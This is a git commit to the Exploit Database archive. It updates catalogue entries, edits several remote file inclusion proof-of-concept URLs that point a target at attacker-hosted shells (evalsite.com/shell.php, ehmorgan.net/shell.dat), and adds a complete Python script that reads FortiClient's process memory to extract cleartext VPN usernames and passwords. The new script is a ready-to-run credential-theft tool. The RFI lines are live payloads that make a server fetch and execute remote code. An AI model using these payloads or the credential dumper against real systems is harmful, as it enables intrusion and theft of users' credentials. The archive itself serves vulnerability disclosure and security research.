From f96ddba143992211f5408339ade73687eeb7d8db Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 2 Sep 2016 05:08:35 +0000 Subject: [PATCH] DB: 2016-09-02 2 new exploits SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion SAPID Blog beta 2 - (root_path) Remote File Inclusion SAPID Gallery 1.0 - (root_path) Remote File Inclusion SAPID Shop 1.2 - (root_path) Remote File Inclusion PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion phNNTP 1.3 - (article-raw.php) Remote File Inclusion Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC Cwfm 0.9.1 - (Language) Remote File Inclusion PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion PHPMyRing 4.2.0 - (view_com.php) SQL Injection SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit phpwcms 1.1-RC4 - (spaw) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion Spaminator 1.7 - (page) Remote File Inclusion Thatware 0.4.6 - (root_path) Remote File Inclusion phpPrintAnalyzer 1.2 - Remote File Inclusion Wheatblog 1.1 - (session.php) Remote File Inclusion phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload FortiClient SSLVPN 5.4 - Credentials Disclosure --- files.csv | 35 ++++++++------- platforms/php/{webapps => local}/2152.php | 0 platforms/php/webapps/2148.txt | 2 +- platforms/php/webapps/2154.txt | 2 +- platforms/php/webapps/2163.txt | 2 +- platforms/php/webapps/2165.txt | 2 +- platforms/php/webapps/2166.txt | 2 +- platforms/php/webapps/2168.txt | 2 +- platforms/php/webapps/2174.txt | 2 +- platforms/windows/local/40330.py | 55 +++++++++++++++++++++++ 10 files changed, 80 insertions(+), 24 deletions(-) rename platforms/php/{webapps => local}/2152.php (100%) create mode 100755 platforms/windows/local/40330.py diff --git a/files.csv b/files.csv index 70a16ec1c..e21d31c63 100755 --- a/files.csv +++ b/files.csv @@ -1824,9 +1824,9 @@ id,file,description,date,author,platform,type,port 2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0 2127,platforms/php/webapps/2127.txt,"Modernbill 1.6 - (config.php) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 -2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 -2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 -2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 +2129,platforms/php/webapps/2129.txt,"SAPID Blog beta 2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 +2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 +2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - (root_path) Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2132,platforms/php/webapps/2132.txt,"phpAutoMembersArea 3.2.5 - (installed_config_file) Remote File Inclusion",2006-08-07,"Philipp Niedziela",php,webapps,0 2133,platforms/php/webapps/2133.txt,"Simple CMS - Administrator Authentication Bypass",2006-08-07,daaan,php,webapps,0 2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta - (base_dir) Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 @@ -1834,7 +1834,7 @@ id,file,description,date,author,platform,type,port 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 2137,platforms/php/webapps/2137.txt,"QuestCMS - 'main.php' Remote File Inclusion",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 -2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,0 +2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet 0.5 - (Core.php) Remote File Inclusion",2006-08-07,Minion,php,webapps,80 2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 @@ -1843,40 +1843,40 @@ id,file,description,date,author,platform,type,port 2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0 2146,platforms/php/webapps/2146.txt,"docpile:we 0.2.2 - (INIT_PATH) Remote File Inclusion",2006-08-08,"Mehmet Ince",php,webapps,0 2147,platforms/windows/dos/2147.pl,"XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)",2006-08-08,Elo,windows,dos,0 -2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0 +2148,platforms/php/webapps/2148.txt,"phNNTP 1.3 - (article-raw.php) Remote File Inclusion",2006-08-08,Drago84,php,webapps,80 2149,platforms/php/webapps/2149.txt,"Hitweb 4.2.1 - (REP_INC) Remote File Inclusion",2006-08-08,Drago84,php,webapps,0 2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0 -2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,0 -2152,platforms/php/webapps/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC",2006-08-08,Heintz,php,webapps,0 +2151,platforms/php/webapps/2151.txt,"Cwfm 0.9.1 - (Language) Remote File Inclusion",2006-08-08,"Philipp Niedziela",php,webapps,80 +2152,platforms/php/local/2152.php,"PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow PoC",2006-08-08,Heintz,php,local,0 2153,platforms/php/webapps/2153.txt,"Boite de News 4.0.1 - 'index.php' Remote File Inclusion",2006-08-09,"the master",php,webapps,0 -2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 +2154,platforms/php/webapps/2154.txt,"PgMarket 2.2.3 - (CFG[libdir]) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,80 2155,platforms/php/webapps/2155.txt,"See-Commerce 1.0.625 - (owimg.php3) Remote File Inclusion",2006-08-09,Drago84,php,webapps,0 2156,platforms/hardware/dos/2156.c,"PocketPC Mms Composer - (WAPPush) Denial of Service",2006-08-09,"Collin Mulliner",hardware,dos,0 2157,platforms/php/webapps/2157.txt,"Tagger Luxury Edition - (BBCodeFile) Remote File Inclusion",2006-08-09,Morgan,php,webapps,0 2158,platforms/php/webapps/2158.txt,"TinyWebGallery 1.5 - (image) Remote File Inclusion",2006-08-09,"Mehmet Ince",php,webapps,0 -2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,0 +2159,platforms/php/webapps/2159.pl,"PHPMyRing 4.2.0 - (view_com.php) SQL Injection",2006-08-09,simo64,php,webapps,80 2160,platforms/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflow PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 -2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 +2161,platforms/php/webapps/2161.pl,"SAPID CMS 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,80 2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445 -2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,0 +2163,platforms/php/webapps/2163.txt,"phpwcms 1.1-RC4 - (spaw) Remote File Inclusion",2006-08-10,Morgan,php,webapps,80 2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 -2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 -2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 +2165,platforms/php/webapps/2165.txt,"Spaminator 1.7 - (page) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 +2166,platforms/php/webapps/2166.txt,"Thatware 0.4.6 - (root_path) Remote File Inclusion",2006-08-10,Drago84,php,webapps,80 2167,platforms/php/webapps/2167.txt,"SaveWebPortal 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 -2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,0 +2168,platforms/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,php,webapps,80 2169,platforms/php/webapps/2169.txt,"Chaussette 080706 - (_BASE) Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 2170,platforms/php/webapps/2170.txt,"VWar 1.50 R14 - (online.php) SQL Injection",2006-08-10,brOmstar,php,webapps,0 2171,platforms/php/webapps/2171.txt,"WEBInsta MM 1.3e - (cabsolute_path) Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 2172,platforms/php/webapps/2172.txt,"Mambo Remository Component 3.25 - Remote File Inclusion",2006-08-10,camino,php,webapps,0 2173,platforms/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,php,webapps,0 -2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,0 +2174,platforms/php/webapps/2174.txt,"Wheatblog 1.1 - (session.php) Remote File Inclusion",2006-08-11,O.U.T.L.A.W,php,webapps,80 2175,platforms/php/webapps/2175.txt,"WEBinsta CMS 0.3.1 - (templates_dir) Remote File Inclusion Exploit",2006-08-12,K-159,php,webapps,0 2176,platforms/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash",2006-08-13,Qode,hardware,dos,0 2177,platforms/php/webapps/2177.txt,"Joomla Webring Component 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",php,webapps,0 2178,platforms/php/webapps/2178.php,"XMB 1.9.6 Final - basename() Remote Command Execution Exploit",2006-08-13,rgod,php,webapps,0 2179,platforms/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,multiple,dos,0 2180,platforms/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,multiple,dos,0 -2181,platforms/php/webapps/2181.pl,"phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,0 +2181,platforms/php/webapps/2181.pl,"phPay 2.02 - (nu_mail.inc.php) Remote mail() Injection Exploit",2006-08-14,beford,php,webapps,80 2182,platforms/php/webapps/2182.txt,"Mambo mmp Component 1.2 - Remote File Inclusion",2006-08-14,mdx,php,webapps,0 2183,platforms/php/webapps/2183.txt,"ProjectButler 0.8.4 - (rootdir) Remote File Inclusion",2006-08-14,"the master",php,webapps,0 2184,platforms/php/webapps/2184.txt,"Mambo Peoplebook Component 1.0 - Remote File Inclusion",2006-08-14,Matdhule,php,webapps,0 @@ -36439,7 +36439,7 @@ id,file,description,date,author,platform,type,port 40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80 40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0 -40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 +40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0 40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 @@ -36459,3 +36459,4 @@ id,file,description,date,author,platform,type,port 40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0 40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 +40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 diff --git a/platforms/php/webapps/2152.php b/platforms/php/local/2152.php similarity index 100% rename from platforms/php/webapps/2152.php rename to platforms/php/local/2152.php diff --git a/platforms/php/webapps/2148.txt b/platforms/php/webapps/2148.txt index 140f3d80c..df8be8be1 100755 --- a/platforms/php/webapps/2148.txt +++ b/platforms/php/webapps/2148.txt @@ -17,7 +17,7 @@ Path: Declare file_newsportal ExP: -http://www.site.com/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php? +http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php? Greatz: Str0ke diff --git a/platforms/php/webapps/2154.txt b/platforms/php/webapps/2154.txt index 113335527..36d0a3caf 100755 --- a/platforms/php/webapps/2154.txt +++ b/platforms/php/webapps/2154.txt @@ -29,7 +29,7 @@ include ($CFG["libdir"] . "stdlib.inc.php"); #################################################### Exploit: -http://www.site.com/[path]/common.inc.php?CFG[libdir]=http://evil_scripts? +http://server/[path]/common.inc.php?CFG[libdir]=http://evil_scripts? #################################################### diff --git a/platforms/php/webapps/2163.txt b/platforms/php/webapps/2163.txt index 4f22f3239..9c2a57ebe 100755 --- a/platforms/php/webapps/2163.txt +++ b/platforms/php/webapps/2163.txt @@ -23,7 +23,7 @@ include/inc_ext/spaw/dialogs/td.php Vendor Website: http://www.phpwcms.de/ PoC: -http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat? +http://server/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat? Google Dork: diff --git a/platforms/php/webapps/2165.txt b/platforms/php/webapps/2165.txt index 289eaed0e..97f21d601 100755 --- a/platforms/php/webapps/2165.txt +++ b/platforms/php/webapps/2165.txt @@ -15,7 +15,7 @@ Path : Declare $page ExpL: -http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php? +http://server/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php? Greatz:str0ke diff --git a/platforms/php/webapps/2166.txt b/platforms/php/webapps/2166.txt index e86c9a6a2..ee888c196 100755 --- a/platforms/php/webapps/2166.txt +++ b/platforms/php/webapps/2166.txt @@ -11,7 +11,7 @@ Page Affect config.php ExP: -http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php' +http://server/dir_thatware/config.php?root_path=http://server/shell.php' Greatz: str0ke diff --git a/platforms/php/webapps/2168.txt b/platforms/php/webapps/2168.txt index 6eb846ab0..9eec5d659 100755 --- a/platforms/php/webapps/2168.txt +++ b/platforms/php/webapps/2168.txt @@ -9,7 +9,7 @@ #cont@ct: gaul@enet.com.cn #Exploit: -http://site.com/[path]/inc/header.inc.php?ficStyle=[evilcode] +http://server/[path]/inc/header.inc.php?ficStyle=[evilcode] Thx to : #batamhacker crew on dal.net h4ntu, havincaz, baylaw and all indonesian underground hacker diff --git a/platforms/php/webapps/2174.txt b/platforms/php/webapps/2174.txt index 84163f594..89d65f6b1 100755 --- a/platforms/php/webapps/2174.txt +++ b/platforms/php/webapps/2174.txt @@ -34,7 +34,7 @@ function Start_Session() *********************************************************************** Proof of Concept: -www.site.com/includes/session.php?wb_class_dir=SHELL +server/includes/session.php?wb_class_dir=SHELL Contact : Outlaw@aria-security.net diff --git a/platforms/windows/local/40330.py b/platforms/windows/local/40330.py new file mode 100755 index 000000000..020b08fd6 --- /dev/null +++ b/platforms/windows/local/40330.py @@ -0,0 +1,55 @@ +''' +Title : Extracting clear text passwords from running processes(FortiClient) +CVE-ID : none +Product : FortiClient SSLVPN +Service : FortiTray.exe +Affected : <=5.4 +Impact : Critical +Remote : No +Website link : http://forticlient.com/ +Reported : 31/08/2016 +Authors : Viktor Minin https://1-33-7.com + Alexander Korznikov http://korznikov.com +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +In our research which involved this program we found that this process store the credentials that you supplied for connecting, in clear text in the process memory. +In this situation a potential attacker who hacked your system can reveal your Username and Password steal and use them. +This may assist him in gaining persistence access to your Organization LAN network. +''' + +from winappdbg import Debug, Process, HexDump +import sys + +filename = "FortiTray.exe" # Process name +search_string = "fortissl" # pattern to get offset when the credentials stored + +# Searching function +def memory_search( pid, strings ): + process = Process( pid ) + mem_dump = [] + ###### + # You could also use process.search_regexp to use regular expressions, + # or process.search_text for Unicode strings, + # or process.search_hexa for raw bytes represented in hex. + ###### + for address in process.search_bytes( strings ): + dump = process.read(address-10,800) #Dump 810 bytes from process memory + mem_dump.append(dump) + for i in mem_dump: + if "FortiClient SSLVPN offline" in i: #print all founds results by offsets to the screen. + print "\n" + print " [+] Address and port to connect: " + str(i[136:180]) + print " [+] UserName: " + str(i[677:685]) + print " [+] Password: " + str(i[705:715]) + print "\n" + +debug = Debug() +try: + # Lookup the currently running processes. + debug.system.scan_processes() + # Look for all processes that match the requested filename... + for ( process, name ) in debug.system.find_processes_by_filename( filename ): + pid = process.get_pid() + memory_search(pid,search_string) +finally: + debug.stop() +